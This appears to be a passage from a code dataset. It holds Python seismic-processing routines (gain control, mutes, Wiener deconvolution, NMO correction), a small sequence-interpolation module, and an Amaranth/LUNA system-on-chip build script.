traces with the same duration in time and sampling\r\n    rate. For each sample, a window is created. The length of the window is set.\r\n    The time window can then be located at three different positions compared \r\n    to the sample:\r\n        trailing:\r\n            Window starts at the sample\r\n        leading:\r\n            Window ends at the sample\r\n        centred:\r\n            Sample is located at the middle of the window\r\n    At the start or end, the length of the window can be shorter to accommodate\r\n    the lack of data at the edges of the record.\r\n\r\n    Parameters\r\n    ----------\r\n    trace : obspy Stream or obspy Trace\r\n        The data for which the window has to be given.\r\n    oper_len : float\r\n        Length of the window in seconds.\r\n    basis : str\r\n        Indicates how the window is located around the sample location. 
Can be\r\n        'trailing', 'leading' or 'centred'.\r\n\r\n    Yields\r\n    ------\r\n    obspy Stream\r\n        The window to be used for the AGC.\r\n\r\n    \"\"\"\r\n    # Depending on if the input is a trace or stream, the information is gotten\r\n    # from a different location\r\n    if isinstance(trace,obspy.Trace):\r\n        time_start = trace.stats.starttime\r\n        dt = trace.stats.delta\r\n        amt_samples = trace.stats.npts\r\n    elif isinstance(trace, obspy.Stream):\r\n        time_start = trace[0].stats.starttime\r\n        dt = trace[0].stats.delta\r\n        amt_samples = trace[0].stats.npts\r\n    \r\n    # With the index for each sample, the window is given\r\n    for sample_idx in range(amt_samples):\r\n        if basis == 'trailing':\r\n            yield trace.slice(starttime=time_start+dt*sample_idx,\r\n                              endtime=time_start+oper_len+dt*sample_idx)\r\n        elif basis == 'leading':\r\n            yield trace.slice(starttime=time_start-oper_len+dt*sample_idx,\r\n                              endtime=time_start+dt*sample_idx)\r\n        elif basis == 'centred':\r\n            yield trace.slice(starttime=time_start-0.5*oper_len+dt*sample_idx,\r\n                              endtime=time_start+0.5*oper_len+dt*sample_idx)\r\n\r\ndef AGC_trace(trace, oper_len, type_scal, basis):\r\n    \"\"\"\r\n    Apply AGC to a single trace. For more information see the function AGC.\r\n\r\n    Parameters\r\n    ----------\r\n    trace : obspy.core.Trace\r\n        Input trace.\r\n    oper_len : float\r\n        The length of the AGC window in seconds.\r\n    type_scal : str\r\n        Which type of scaling is used on the data. Can be 'mean', 'median' or\r\n        'RMS'\r\n    basis : str\r\n        Location of the window compared to each sample. Can be 'trailing', \r\n        'leading', 'centred'.\r\n\r\n    Returns\r\n    -------\r\n    trace : obspy.core.Trace\r\n        Trace balanced with AGC.\r\n\r\n    \"\"\"\r\n    # Create a copy of the trace\r\n    new_trace = trace.copy()\r\n    \r\n    # Go over each AGC window\r\n    for i,window in enumerate(get_AGC_window(trace, oper_len, basis)):\r\n        # Get the gain scaling\r\n        scalar = AGC_scaling_val(window, type_scal)\r\n        new_trace.data[i] = trace[i]*scalar\r\n    # Return the balanced copy of the trace\r\n    return new_trace\r\n\r\ndef AGC_old(record, oper_len, type_scal, basis):\r\n    \"\"\"\r\n    Automatic Gain Control balances the gain based on the amplitude in a local\r\n    window. The function is based on the AGC function from SeisSpace ProMAX. \r\n    Scaling can be done based on the inverse of:\r\n        mean\r\n        median\r\n        RMS \r\n    The location of the window can be set as:\r\n        trailing:\r\n            Following the sample\r\n        leading:\r\n            Preceding the sample\r\n        centred:\r\n            The sample is located at the centre of the window\r\n    \r\n    See also:\r\n    https://esd.halliburton.com/support/LSM/GGT/ProMAXSuite/ProMAX/5000/5000_8/Help/promax/agc.pdf\r\n\r\n    Parameters\r\n    ----------\r\n    record : obspy Stream\r\n        The record that has to be balanced.\r\n    oper_len : float\r\n        Window length in seconds.\r\n    type_scal : str\r\n        Which type of scaling is used on the data. Can be 'mean', 'median' or\r\n        'RMS'\r\n    basis : str\r\n        Location of the window compared to each sample. 
Can be 'trailing', \r\n 'leading', 'centred'.\r\n\r\n Returns\r\n -------\r\n new_record : obspy Stream\r\n The new record after application of AGC.\r\n\r\n \"\"\"\r\n # Create a copy of the original data\r\n new_record = record.copy()\r\n # Get the data as an array\r\n data = stream_to_array(record)\r\n \r\n # Go over each sample and create the window\r\n for i,window in enumerate(get_AGC_window(record, oper_len, basis)):\r\n # Get the scaling value for each trace\r\n scalars = AGC_scaling_val(window, type_scal)\r\n # Multiply the data with the scalars\r\n data[:,i] *= scalars\r\n \r\n # Now add the new data to the record\r\n for i,trace in enumerate(new_record):\r\n trace.data = data[i,:]\r\n \r\n return new_record\r\n\r\ndef AGC(record,oper_len,type_scal,basis):\r\n \"\"\"\r\n Automatic Gain Control balances the gain based on the amplitude in a local\r\n window. The function is based on the AGC function from SeisSpace ProMAX. \r\n Scaling can be done based on the inverse of:\r\n mean\r\n median\r\n RMS \r\n The location of the window can be set as:\r\n trailing:\r\n Following the sample\r\n leading:\r\n Preceding the sample\r\n centred:\r\n The sample is located at the centre of the window\r\n \r\n See also:\r\n https://esd.halliburton.com/support/LSM/GGT/ProMAXSuite/ProMAX/5000/5000_8/Help/promax/agc.pdf\r\n\r\n Parameters\r\n ----------\r\n record : obspy Stream\r\n The record that has to be balanced.\r\n oper_len : float\r\n Window length in seconds.\r\n type_scal : str\r\n Which type of scaling is used on the data. Can be 'mean', 'median' or\r\n 'RMS'\r\n basis : str\r\n Location of the window compared to each sample. Can be 'trailing', \r\n 'leading', 'centred'.\r\n\r\n Returns\r\n -------\r\n new_record : obspy Stream\r\n The new record after application of AGC.\r\n\r\n \"\"\"\r\n # XXX Faster methods have not yet been implemented for the other means, so \r\n # they use the old function \r\n if type_scal in ['median','RMS']:\r\n return AGC_old(record,oper_len,type_scal,basis)\r\n \r\n dt = record[0].stats.delta\r\n # The operator length in amount of data points\r\n oper_len_items = int(np.round(oper_len/dt+1))\r\n \r\n new_record = record.copy()\r\n \r\n # The convolution operator for the mean\r\n operator = np.ones(oper_len_items)\r\n \r\n # Convert the data to an array\r\n data = stream_to_array(record)\r\n \r\n # Calculate how many data points are used for each point\r\n scal_vals = np.convolve(np.ones(data.shape[1]),operator,'full')\r\n \r\n # Convolve the data with the operator and divide by the amount of points\r\n # used to get the mean\r\n convolve = convolve2d(abs(data),operator[np.newaxis,:],'full')/scal_vals[np.newaxis,:]\r\n \r\n convolve = np.where(convolve==0,1,convolve)\r\n \r\n # Now snip out the relevant part for each method\r\n if basis == 'trailing':\r\n snipped = 1/convolve[:,oper_len_items-1:]\r\n elif basis == 'leading':\r\n snipped = 1/convolve[:,:-oper_len_items+1]\r\n elif basis == 'centred':\r\n snipped = 1/convolve[:,int(oper_len_items/2):int(-oper_len_items/2)]\r\n \r\n # Multiply the data with the scaling values\r\n data *= snipped\r\n \r\n # Now add the new data to the record\r\n for i,trace in enumerate(new_record):\r\n trace.data = data[i,:]\r\n \r\n return new_record\r\n\r\ndef TAR_trace(trace, power_constant):\r\n \"\"\"\r\n TAR function that works on a single trace. 
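The gain correction\r\n    g(t)=t^power_constant is multiplied sample-by-sample with the trace data. 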
For more information see the \r\n    function TAR.\r\n\r\n    Parameters\r\n    ----------\r\n    trace : obspy Trace\r\n        Input trace.\r\n    power_constant : float\r\n        Power constant for time raised to a power gain correction.\r\n\r\n    Returns\r\n    -------\r\n    new_trace : obspy Trace\r\n        Output trace.\r\n\r\n    \"\"\"\r\n    # Create a copy of the trace\r\n    new_trace = trace.copy()\r\n    \r\n    # Get the gain corrections\r\n    pow_mult = trace.times()**power_constant\r\n    # Apply it to the new trace\r\n    new_trace.data = trace.data*pow_mult\r\n    \r\n    return new_trace\r\n\r\ndef TAR(record, power_constant):\r\n    \"\"\"\r\n    Apply a very basic version of True Amplitude Recovery to a section. Based\r\n    on the TAR function in SeisSpace ProMAX. A gain correction is applied to \r\n    the data as time raised to a power:\r\n        g(t)=t^power_constant\r\n    \r\n    See also:\r\n    https://esd.halliburton.com/support/LSM/GGT/ProMAXSuite/ProMAX/5000/5000_8/Help/promax/tar.pdf\r\n\r\n    Parameters\r\n    ----------\r\n    record : obspy Stream\r\n        Stream of input data.\r\n    power_constant : float\r\n        Power constant to which the time is raised for the gain correction.\r\n\r\n    Returns\r\n    -------\r\n    new_record : obspy Stream\r\n        Stream with TAR applied.\r\n\r\n    \"\"\"\r\n    # Create a new record\r\n    new_record = record.copy()\r\n    \r\n    # Get the gain correction for each time\r\n    pow_mult = record[0].times()**power_constant\r\n    \r\n    # Multiply this with the data\r\n    data = stream_to_array(record)\r\n    data = data*pow_mult[np.newaxis,:]\r\n    \r\n    # Now attach the information to each trace\r\n    for i,trace in enumerate(new_record):\r\n        trace.data = data[i,:]\r\n    return new_record\r\n    \r\ndef ramp_func(len_ramp,idx_ramp,len_data):\r\n    \"\"\"\r\n    A ramp function where the ramp has a specified length, is centred around\r\n    a specific position and the full array has a specified length.\r\n\r\n    Parameters\r\n    ----------\r\n    len_ramp : int\r\n        In how many elements of the array the function increases from 0 to 1.\r\n    idx_ramp : int\r\n        At which position the ramp part is found. The index indicates the \r\n        centre of the ramp.\r\n    len_data : int\r\n        The length of the total array.\r\n\r\n    Returns\r\n    -------\r\n    mult : np.ndarray\r\n        The resulting ramp function.\r\n\r\n    \"\"\"\r\n    # The ramp part\r\n    ramp = np.linspace(0,1,len_ramp)\r\n    # The total function\r\n    mult = np.zeros(len_data)\r\n    \r\n    # Find the index at which the ramp starts and ends\r\n    idx_start = int(max(0,idx_ramp-0.5*len_ramp))\r\n    idx_end = int(min(len_data,idx_ramp+0.5*len_ramp))\r\n    \r\n    # If the ramp is not fully included (because it goes over the edge of the\r\n    # function), we want to include only part of ramp. Find the right index\r\n    # for this\r\n    idx_start_ramp = max(0,int(-(idx_ramp-0.5*len_ramp)))\r\n    idx_end_ramp = min(len(ramp),int(len_data - idx_ramp+0.5*len_ramp))\r\n    \r\n    # Include the ramp part in the function\r\n    mult[idx_start:idx_end] = ramp[idx_start_ramp:idx_end_ramp]\r\n    # Set everything after the end of the ramp to one\r\n    mult[idx_end:] = 1\r\n    \r\n    return mult\r\n\r\ndef logistic_func(len_ramp,idx_ramp,len_data):\r\n    \"\"\"\r\n    A logistic function that has asymptotes 0 and 1, and its maximum slope at\r\n    the specified index location. The length of the array is also determined.\r\n\r\n    Parameters\r\n    ----------\r\n    len_ramp : int\r\n        A rough indication of how quickly the function increases around the \r\n        maximum slope. 
Is made to mimic the ramp function in ramp_func.\r\n    idx_ramp : int\r\n        At what index the maximum slope (or where the second derivative is 0)\r\n        can be found.\r\n    len_data : int\r\n        The total length of the resulting array.\r\n\r\n    Returns\r\n    -------\r\n    act_func : np.ndarray\r\n        An array of the specified length that contains the logistic function.\r\n\r\n    \"\"\"\r\n    # Values on the x-axis\r\n    x_vals = np.linspace(1,len_data,len_data)\r\n    # Logistic function with correctly scaled ramp\r\n    act_func = 1/(1+np.exp(-(x_vals-idx_ramp)/(0.33*len_ramp)))\r\n    \r\n    return act_func\r\n\r\ndef trace_mute(data,method,idx_cut,len_ramp = None):\r\n    \"\"\"\r\n    Apply a top mute to a trace at the specified index with a certain function.\r\n    This can be a step function, ramp function or sigmoid.\r\n\r\n    Parameters\r\n    ----------\r\n    data : np.ndarray\r\n        Array containing the data of the trace.\r\n    method : str\r\n        With which function to apply the top mute. Can be:\r\n            step\r\n            ramp - Index determines the middle of the ramp\r\n            sigmoid - Index determines the highest slope of the function\r\n                (where the second derivative is zero)\r\n    idx_cut : int\r\n        At which index to start the data. The ramp and sigmoid functions \r\n        surround this location\r\n    len_ramp : int, optional\r\n        Length of the ramp in the ramp function in elements of the array. The \r\n        sigmoid function will be similar to the ramp function. \r\n        The default is None.\r\n\r\n    Raises\r\n    ------\r\n    ValueError\r\n        If method is neither 'step', 'ramp' nor 'sigmoid'.\r\n\r\n    Returns\r\n    -------\r\n    np.ndarray\r\n        Array containing the data with the mute applied.\r\n\r\n    \"\"\"\r\n    \r\n    if method == 'step':\r\n        # Simply take the values that are higher than the index\r\n        return np.where(np.linspace(1,len(data),len(data))-1 <= idx_cut,0,data)\r\n    elif method == 'ramp':\r\n        # Create a ramp function with its ramp around the specified index\r\n        mult = ramp_func(len_ramp,idx_cut,len(data))\r\n    elif method == 'sigmoid':\r\n        # Define the logistic function so that it has its maximum curvature \r\n        # around the specified index and its asymptotes are 0 and 1.\r\n        mult = logistic_func(len_ramp,idx_cut,len(data))\r\n    else:\r\n        # If none of the other methods are used, something has gone wrong\r\n        raise ValueError(\"Method is not used correctly, can be 'step', 'ramp' or 'sigmoid'.\")\r\n    \r\n    # Multiply the data with the specified function\r\n    return data*mult\r\n    \r\ndef mute_cone(record,method,vel_mute,shift,len_ramp=None):\r\n    \"\"\"\r\n    Apply a top mute to a record in the shape of a cone around the shot location. \r\n    The cone is characterised by a velocity for the angle and a shift to let it \r\n    start earlier or later in the record. The mute can be applied as a step\r\n    function, a ramp function or as a sigmoid.\r\n\r\n    Parameters\r\n    ----------\r\n    record : obspy.core.stream.Stream\r\n        Stream that will be muted. Distance from the shot location should be \r\n        defined for each trace in trace.stats.distance\r\n    method : str\r\n        Which method is used for the mute function. Can be:\r\n            step - Use a step function\r\n            ramp - Use a ramp function\r\n            sigmoid - Use the logistic function\r\n    vel_mute : float\r\n        The velocity to use for the slope of the cone.\r\n    shift : float\r\n        A time shift in seconds for the whole cone. Can also be negative.\r\n    len_ramp : float, optional\r\n        The length of the ramp for the ramp function or a similar increase for\r\n        the sigmoid function. Does not have to be provided if a step function \r\n        is used. 
The default is None.\r\n\r\n    Raises\r\n    ------\r\n    ValueError\r\n        If len_ramp is not defined while using method 'ramp' or 'sigmoid'.\r\n\r\n    Returns\r\n    -------\r\n    new_record : obspy.core.stream.Stream\r\n        The input record with the top mute defined.\r\n\r\n    \"\"\"\r\n    # Get the time step of the data\r\n    dt = record[0].stats.delta\r\n    \r\n    # Check if ramp is defined if method is 'ramp' or 'sigmoid'\r\n    methods_ramp = ['ramp','sigmoid']\r\n    if method in methods_ramp:\r\n        if len_ramp is None:\r\n            raise ValueError(f\"len_ramp must be defined when using the following methods: {methods_ramp}\")\r\n        else:\r\n            # Convert len_ramp from an amount of seconds to an index\r\n            len_ramp = int(len_ramp/dt)\r\n    \r\n    # Get the distances from the shot location from the stream\r\n    dists = []\r\n    for trace in record:\r\n        dists.append(trace.stats.distance)\r\n    dists = abs(np.array(dists))\r\n    \r\n    # Calculate at what index to start the trace\r\n    cut_off_idcs = np.array(dists/vel_mute/dt,dtype=int) + int(shift/dt)\r\n    \r\n    # Create a new stream to put the results in\r\n    new_record = record.copy()\r\n    for i,trace in enumerate(new_record):\r\n        # To be certain, enforce a minimum and maximum index\r\n        cut_off = max(0,cut_off_idcs[i])\r\n        cut_off = min(len(trace)-1,cut_off)\r\n        \r\n        # Mute each trace by the required amount\r\n        trace.data = trace_mute(trace.data,method,cut_off,len_ramp=len_ramp)\r\n    return new_record\r\n\r\ndef levinson_recursion(autocorr, rhs):\r\n    \"\"\"\r\n    Python implementation of the Matlab CREWES function to solve system Tx=b\r\n    with Levinson recursion.\r\n\r\n    Parameters\r\n    ----------\r\n    autocorr : numpy.ndarray\r\n        Input autocorrelation vector. Must be fully causal\r\n    rhs : numpy.ndarray\r\n        Input right-hand-side vector.\r\n\r\n    Raises\r\n    ------\r\n    ValueError\r\n        Raised if the autocorrelation does not have its maximum value at the\r\n        first index.\r\n\r\n    Returns\r\n    -------\r\n    x : np.ndarray\r\n        Solution vector.\r\n\r\n    \"\"\"\r\n    autocorr = autocorr.squeeze()\r\n    # Test if autocorr has a single dimension\r\n    if autocorr.ndim != 1:\r\n        raise ValueError(\"autocorr must be a vector\")\r\n    # Make it into a column vector\r\n    autocorr = autocorr[:,np.newaxis]\r\n    \r\n    rhs = rhs.squeeze()\r\n    if rhs.ndim != 1:\r\n        raise ValueError(\"rhs must be a vector\")\r\n    \r\n    rhs = rhs[:,np.newaxis]\r\n    \r\n    # Normalise autocorr\r\n    if autocorr[0] != 1.:\r\n        autocorr = autocorr/autocorr.max()\r\n    \r\n    if autocorr[0] != autocorr.max():\r\n        raise ValueError(\"Invalid autocorrelation, zero lag not maximum\")\r\n    \r\n    # Initialise\r\n    a = autocorr[1:]\r\n    n = len(rhs)\r\n    y = np.zeros(len(a))\r\n    x = np.zeros(len(rhs))\r\n    z = np.zeros(len(a))\r\n    \r\n    y[0] = -a[0]\r\n    x[0] = rhs[0]\r\n    beta = 1\r\n    alpha = -a[0]\r\n    \r\n    # Main recursion loop\r\n    for k in range(1,n):\r\n        beta = (1 - alpha**2)*beta\r\n        beta = beta.squeeze()\r\n        \r\n        mu = (rhs[k] - a[:k].T.dot(x[k-1::-1]))/beta\r\n        mu = mu.squeeze()\r\n        \r\n        nu = x[:k] + mu*y[k-1::-1]\r\n\r\n        x[:k] = nu[:k]\r\n        x[k] = mu\r\n        \r\n        if k < n-1:\r\n            # print(a[:k].T.shape, y[k::-1].shape,beta.shape)\r\n            alpha = -(a[k] + a[:k].T.dot(y[k-1::-1]))/beta\r\n            alpha = alpha.squeeze()\r\n            \r\n            z[:k] = y[:k] + alpha * y[k-1::-1]\r\n            y[:k] = z[:k]\r\n            y[k] = alpha\r\n    \r\n    return x\r\n\r\ndef wiener_decon(trace,design_trace,n,stab=0.0001):\r\n    \"\"\"\r\n    Python implementation of Matlab CREWES Wiener deconvolution function. 
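A spiking deconvolution operator\r\n    of n autocorrelation lags is designed from design_trace with\r\n    levinson_recursion and convolved with trace. A minimal usage sketch,\r\n    assuming an obspy Stream has been read (the file name and the operator\r\n    length are illustrative, not part of this module):\r\n\r\n        import obspy\r\n        st = obspy.read('raw_panel.mseed')\r\n        decon = wiener_decon(st[0], st[0], n=80)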
\r\n\r\n    Parameters\r\n    ----------\r\n    trace : obspy.core.trace.Trace\r\n        Input trace.\r\n    design_trace : obspy.core.trace.Trace\r\n        Trace used for operator design.\r\n    n : int\r\n        How many lags of the autocorrelation to use.\r\n    stab : float, optional\r\n        Stabilisation factor as fraction of zero-lag. The default is 0.0001.\r\n\r\n    Returns\r\n    -------\r\n    new_trace : obspy.core.trace.Trace\r\n        Deconvolved trace.\r\n\r\n    \"\"\"\r\n    \r\n    if not isinstance(design_trace, obspy.core.trace.Trace):\r\n        raise ValueError(f\"Design trace is not a trace but {type(design_trace)}\")\r\n    \r\n    # autocorr_raw = th.TauP.cross_corr(design_trace,design_trace)\r\n    autocorr_raw = np.correlate(design_trace,design_trace,mode='full')\r\n    # Take causal part and right lag\r\n    halfway = int(len(autocorr_raw)/2)\r\n    autocorr = autocorr_raw[halfway:halfway+n]\r\n    \r\n    # Stabilise the autocorrelation\r\n    autocorr[0] = autocorr[0]*(1+stab)\r\n    autocorr = autocorr / autocorr[0]\r\n    \r\n    # Generate right-hand-side \r\n    rhs = np.zeros(len(autocorr))\r\n    rhs[0] = 1.\r\n    \r\n    x = levinson_recursion(autocorr, rhs)\r\n    x /= np.sqrt(x.T.dot(x))\r\n    \r\n    new_trace = obspy.Trace()\r\n    new_trace.data = np.convolve(trace,x)[:int(-n+1)]\r\n    new_trace.stats = trace.stats\r\n    new_trace = normalise_trace(new_trace)\r\n    return new_trace\r\n\r\ndef wiener_decon_stream(record,design_id,n):\r\n    \"\"\"\r\n    The Wiener deconvolution applied to every trace in a stream. The design \r\n    trace can be set to one of the traces in the stream, a provided trace or \r\n    each trace uses itself. \r\n\r\n    Parameters\r\n    ----------\r\n    record : obspy.core.Stream\r\n        The stream on which Wiener deconvolution is applied.\r\n    design_id : int or obspy.core.Trace or str\r\n        There are three options:\r\n            'all' - each trace uses itself as a design trace\r\n            int - the trace at the provided index in the stream is used as a \r\n                design trace\r\n            Trace - a separate trace is provided as the design trace\r\n    n : int\r\n        How many lags of the autocorrelation to use.\r\n\r\n    Returns\r\n    -------\r\n    new_stream : obspy.core.stream.Stream\r\n        The deconvolved stream.\r\n\r\n    \"\"\"\r\n    \r\n    # Initiate a new stream to put the results in\r\n    new_stream = obspy.Stream()\r\n    \r\n    # If every trace uses itself as design trace\r\n    if design_id == 'all':\r\n        # use the trace as the second argument\r\n        for trace in record:\r\n            new_stream += wiener_decon(trace,trace,n)\r\n        return new_stream\r\n    \r\n    # If the design trace is indicated as an index, get the right trace out of \r\n    # the stream\r\n    if isinstance(design_id,int):\r\n        design_trace = record[design_id].copy()\r\n    # If a separate trace is provided, use it directly as the design trace\r\n    elif isinstance(design_id,obspy.Trace):\r\n        design_trace = design_id.copy()\r\n    \r\n    # Deconvolve each trace with the design trace\r\n    for trace in record:\r\n        new_stream += wiener_decon(trace, design_trace, n)\r\n    \r\n    return new_stream\r\n\r\ndef NMO_corr(record,vel):\r\n    \"\"\"\r\n    Apply an NMO correction on a record. The distance from the midpoint \r\n    (offset) must be defined on each trace as trace.stats.distance. The shot\r\n    time is assumed to be at 0.0 s. The NMO variation is then:\r\n        T(x) - t_0 = sqrt(x^2/v^2 + t_0^2) - t_0,\r\n    where t_0 is the vertical two-way time, v is the rms velocity and x the \r\n    offset. \r\n    vel can be a single velocity or a velocity model for every time \r\n    step in the record.\r\n\r\n    Parameters\r\n    ----------\r\n    record : obspy.core.stream.Stream\r\n        Stream on which the NMO correction is applied. 
Offset must be defined\r\n        for every trace at trace.stats.distance\r\n    vel : float or np.ndarray\r\n        [m/s] Either a single value or an array with a velocity value for every \r\n        time step in the record.\r\n\r\n    Returns\r\n    -------\r\n    shift_data : np.ndarray\r\n        [amt of time steps, amt of traces] NMO corrected data array. \r\n        To recreate the stream, use the function recreate_stream\r\n\r\n    \"\"\"\r\n    # Create an array with all vertical two-way travel times\r\n    times = record[0].times()[:,np.newaxis]\r\n    \r\n    # Make a column vector of the velocity array to broadcast with the time \r\n    # array\r\n    if isinstance(vel,np.ndarray) and vel.ndim == 1:\r\n        vel = vel[:,np.newaxis]\r\n    \r\n    # Get all offsets\r\n    dists = []\r\n    for trace in record:\r\n        dists.append(trace.stats.distance)\r\n    # And make an array from it\r\n    dists = np.array(dists)[np.newaxis,:]\r\n    dt = record[0].stats.delta\r\n    \r\n    # Now we create two index masks so that the index along the normal move-out\r\n    # line is taken\r\n    \r\n    # First the time index is taken, calculated as the normal move-out at each\r\n    # offset provided for each vertical two-way time with the velocity that \r\n    # belongs to each time.\r\n    idx_time = np.round(( np.sqrt(np.square(dists) / np.square(vel) + np.square(times)) ) / dt).astype(int)\r\n    \r\n    # Where the index is higher than the actual list of times, zeroes should be\r\n    # added instead\r\n    mask_zeroes = np.where(idx_time >= len(times), True, False)\r\n    \r\n    # For the index, a placeholder is used in the meanwhile\r\n    idx_time[mask_zeroes] = len(times)-1\r\n\r\n    # The second index is just the index of each trace in the stream,\r\n    # repeated for each time value \r\n    idx_space = (np.linspace(0,len(record)-1,len(record))[np.newaxis,:] + np.zeros(len(times))[:,np.newaxis]).astype(int)\r\n    \r\n    # Convert the record into an array with the data\r\n    data = stream_to_array(record)\r\n    \r\n    # Index the data at the specified positions to get the NMO corrected data\r\n    shift_data = data[idx_space,idx_time]\r\n    # Insert zeroes at the right positions\r\n    shift_data[mask_zeroes] = 0\r\n    \r\n    return shift_data","repo_name":"shwhassing/thesis_functions","sub_path":"thesis_functions/proc.py","file_name":"proc.py","file_ext":"py","file_size_in_byte":56151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"19945836118","text":"## @file SeqServices.py\n# @title SeqServices\n# @author Lawrence Chung\n# @brief Sequence operations\n\n\n## @brief determines whether sequence is ascending\n# @param X a sequence in the form of a list\n# @return boolean, true if ascending, false if not\ndef isAscending(X):\n\tj = 0\n\ti = 0\n\twhile(j < len(X)-1):\n\t\tif(X[j+1] >= X[j]):\n\t\t\ti += 1\n\t\tj += 1\n\tif(i == len(X)-1):\n\t\treturn True\n\telse:\n\t\treturn False\n\n## @brief determines if input value is in sequence\n# @param X a Sequence of values \n# @param x value to be checked\n# @return boolean, True if in bounds, False if not\ndef isInBounds(X, x):\n\tif(x < X[0] or x > X[len(X)-1]):\n\t\treturn False\n\telse:\n\t\treturn True\n\n## @brief linear interpolation\n# @details Determines the corresponding y using formula\n# @param x1 independent variable of first set of points\n# @param y1 dependent variable of first set of points\n# @param x2 independent variable of second set of points\n# @param y2 dependent variable of second set of points\n# @param x the x value that will be interpolated\n# @return the y value determined through interpolation\ndef 
interpLin(x1, y1, x2, y2, x):\n\ttempVal = (y2 - y1)/(x2 - x1)\n\tval = tempVal*(x - x1) + y1\n\treturn val\n\n## @brief Quadratic interpolation\n# @details Determines the corresponding y using formula\n# @param x0 independent variable of first set of points\n# @param y0 dependent variable of first set of points\n# @param x1 independent variable of second set of points\n# @param y1 dependent variable of second set of points\n# @param x2 independent variable of third set of points\n# @param y2 dependent variable of third set of points\n# @param x the x value that will be interpolated\n# @return the y value determined through interpolation\ndef interpQuad(x0, y0, x1, y1, x2, y2, x):\n\ttempVal = ((y2 - y0)/(x2- x0))*(x - x1)\n\ttempVal2 = ((y2 - 2*y1 + y0)/(2*(x2-x1)**2))*(x-x1)**2\n\tval = y1 + tempVal + tempVal2\n\treturn val\n\n## @brief Determines index of value in sequence\n# @param X A sequence of x values\n# @param x a value in Sequence X\n# @return the index of the x value\ndef index(X, x):\n\tif(isInBounds(X,x) and isAscending(X)):\n\t\ti = 0\n\t\twhile(i < len(X)):\n\t\t\tif(X[i] == x):\n\t\t\t\treturn i\n\t\t\ti += 1\n","repo_name":"chungl1/schoolWork","sub_path":"pythonProject/src/SeqServices.py","file_name":"SeqServices.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"74549652796","text":"from luna import configure_default_logging, top_level_cli\nfrom luna.gateware.usb.usb2.device import USBDevice\n\nfrom luna_soc.gateware.soc import LunaSoC\nfrom luna_soc.gateware.csr import GpioPeripheral, LedPeripheral\n\nfrom amaranth import Elaboratable, Module, Cat\nfrom amaranth.hdl.rec import Record\n\nfrom lambdasoc.cpu.minerva import MinervaCPU\n\nimport logging\nimport os\nimport sys\n\nCLOCK_FREQUENCIES_MHZ = {\n    'sync': 60\n}\n\n# - HelloSoc ------------------------------------------------------------------\n\nclass HelloSoc(Elaboratable):\n    def __init__(self, clock_frequency):\n\n        # create a stand-in for our UART\n        self.uart_pins = Record([\n            ('rx', [('i', 1)]),\n            ('tx', [('o', 1)])\n        ])\n\n        # create our SoC\n        internal_sram_addr = 0x40000000\n        internal_sram_size = 32768\n        self.soc = LunaSoC(\n            cpu=MinervaCPU(\n                with_debug    = False,\n                with_icache   = True,\n                icache_nlines = 16,\n                icache_nwords = 4,\n                icache_nways  = 1,\n                icache_base   = internal_sram_addr,\n                icache_limit  = internal_sram_addr + internal_sram_size,\n                with_dcache   = True,\n                dcache_nlines = 16,\n                dcache_nwords = 4,\n                dcache_nways  = 1,\n                dcache_base   = internal_sram_addr,\n                dcache_limit  = internal_sram_addr + internal_sram_size,\n                with_muldiv   = False,\n                reset_address = 0x00000000,\n            ),\n            clock_frequency=clock_frequency,\n            internal_sram_addr=internal_sram_addr,\n            internal_sram_size=internal_sram_size,\n        )\n\n        # ... add bios and core peripherals ...\n        self.soc.add_bios_and_peripherals(uart_pins=self.uart_pins)\n\n        # ... 
add our LED peripheral, for simple output.\n self.leds = LedPeripheral()\n self.soc.add_peripheral(self.leds, addr=0xf0001000)\n\n def elaborate(self, platform):\n m = Module()\n m.submodules.soc = self.soc\n\n # generate our domain clocks/resets\n m.submodules.car = platform.clock_domain_generator(clock_frequencies=CLOCK_FREQUENCIES_MHZ)\n\n # connect up our UART\n uart_io = platform.request(\"uart\", 0)\n m.d.comb += [\n uart_io.tx.o.eq(self.uart_pins.tx),\n self.uart_pins.rx.eq(uart_io.rx)\n ]\n if hasattr(uart_io.tx, 'oe'):\n m.d.comb += uart_io.tx.oe.eq(~self.soc.uart._phy.tx.rdy),\n\n return m\n\n\n# - main ----------------------------------------------------------------------\n\nfrom luna.gateware.platform import get_appropriate_platform\n\nfrom luna_soc.generate import Generate, Introspect\n\nif __name__ == \"__main__\":\n # disable UnusedElaborable warnings\n from amaranth._unused import MustUse\n MustUse._MustUse__silence = True\n\n build_dir = os.path.join(\"build\")\n\n # configure logging\n configure_default_logging()\n logging.getLogger().setLevel(logging.DEBUG)\n\n # select platform\n platform = get_appropriate_platform()\n if platform is None:\n logging.error(\"Failed to identify a supported platform\")\n sys.exit(1)\n\n # configure clock frequency\n clock_frequency = int(platform.default_clk_frequency)\n logging.info(f\"Platform clock frequency: {clock_frequency}\")\n\n # create design\n design = HelloSoc(clock_frequency=clock_frequency)\n\n # TODO fix litex build\n thirdparty = os.path.join(build_dir, \"lambdasoc.soc.cpu/bios/3rdparty/litex\")\n if not os.path.exists(thirdparty):\n logging.info(\"Fixing build, creating output directory: {}\".format(thirdparty))\n os.makedirs(thirdparty)\n\n # build litex bios\n logging.info(\"Building bios\")\n design.soc.build(name=\"soc\",\n build_dir=build_dir,\n do_init=True)\n\n # build soc\n logging.info(\"Building soc\")\n overrides = {\n \"debug_verilog\": True,\n \"verbose\": False,\n }\n products = platform.build(design, do_program=False, build_dir=build_dir, **overrides)\n\n # log resources and prepare to generate artifacts\n Introspect(design.soc).log_resources()\n generate = Generate(design.soc)\n\n # generate: c-header and ld-script\n path = os.path.join(build_dir, \"genc\")\n if not os.path.exists(path):\n os.makedirs(path)\n\n logging.info(\"Generating c-header and ld-script: {}\".format(path))\n with open(os.path.join(path, \"resources.h\"), \"w\") as f:\n generate.c_header(platform_name=platform.name, file=f)\n with open(os.path.join(path, \"soc.ld\"), \"w\") as f:\n generate.ld_script(file=f)\n\n print(\"Build completed. 
